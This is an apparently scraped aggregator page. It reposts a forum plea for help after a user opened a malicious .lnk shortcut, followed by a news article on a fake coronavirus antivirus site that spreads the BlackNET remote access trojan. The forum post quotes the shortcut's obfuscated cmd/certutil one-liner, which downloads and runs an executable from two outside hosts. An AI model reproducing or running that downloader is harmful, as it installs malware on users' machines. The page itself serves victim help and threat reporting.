Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Fake antivirus site promises coronavirus protection, delivers trojan - ComputerWeekly.com

Fake antivirus site promises coronavirus protection, delivers trojan - ComputerWeekly.com


Fake antivirus site promises coronavirus protection, delivers trojan - ComputerWeekly.com

Posted: 24 Mar 2020 12:00 AM PDT

A fraudulent website that claims to offer a digital antivirus program that protects users against the Covid-19 coronavirus has been found online, tricking its victims into downloading a remote access trojan, or Rat, that turns the target computer into a bot.

The site in question is just one of a number of scam websites that have been newly identified by Malwarebytes, and more are popping up all the time, as cyber criminals try out any means to cash in on what is becoming, by some margin, one of the most dangerous and widespread cyber security threats in history.

"Scammers and malware authors are taking advantage of the coronavirus crisis in full swing. We have seen a number of spam campaigns using Covid-19 as a lure to trick people into installing a variety of malware, but especially data stealers," said the Malwarebytes threat intelligence team in a blog post disclosing its latest research.

"As more of us work from home, the need to secure your computer, especially if you are connecting to your company's network, becomes more important. However, you should be extra careful of bogus security software, especially if it tries to use the coronavirus as a selling point."

It should go without saying that no cyber security antivirus product could possibly provide protection against an actual biological virus. However, those responsible for the scam – to which we are not linking – have almost certainly already ensnared numerous victims and will be counting on stressed and emotional people being more likely to fall for the trick.

Fake website offering protection against the coronavirus

The website (pictured) states: "Our scientists from Harvard University have been working on a special AI development to combat the virus using a windows app. Your PC actively protects you against the Coronaviruses (Cov) while the app is running."

If a user is unfortunate enough to install the application, they will find themselves infected by the BlackNET Rat, giving cyber criminals the ability to access the target machine from a command and control (C2) server.

BlackNET enables cyber criminals to co-opt the target machine into a botnet to conduct distributed denial of service (DDoS) attacks, to take screenshots, to steal Firefox cookies, to steal saved passwords, to implement a keylogger, to remotely execute other malicious scripts, and to steal bitcoin wallets if present. Malwarebytes said the full source code for this particular toolkit has been circulating on GitHub for at least a month.

"Users should be extra careful of bogus security software, especially if it tries to use the coronavirus as a selling point"
Malwarebytes threat intelligence team

In this instance, Malwarebytes was able to work with CloudFlare, whose service was being abused to deliver the malicious website. CloudFlare has now taken action to flag the website as a phishing scam.

"During this period, it is important to stay safe both at home and online. The number of scams we have seen during these past few weeks shows that criminals will take advantage of any situation, no matter how dire it is," the researchers said.

"We recommend that you keep your computer up to date and use extra caution when downloading new programs. Beware of instant notifications and other messages, even if they appear to come from friends."

More information, including further screengrabs and indicators of compromise (IoCs), can be found on the Malwarebytes website.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US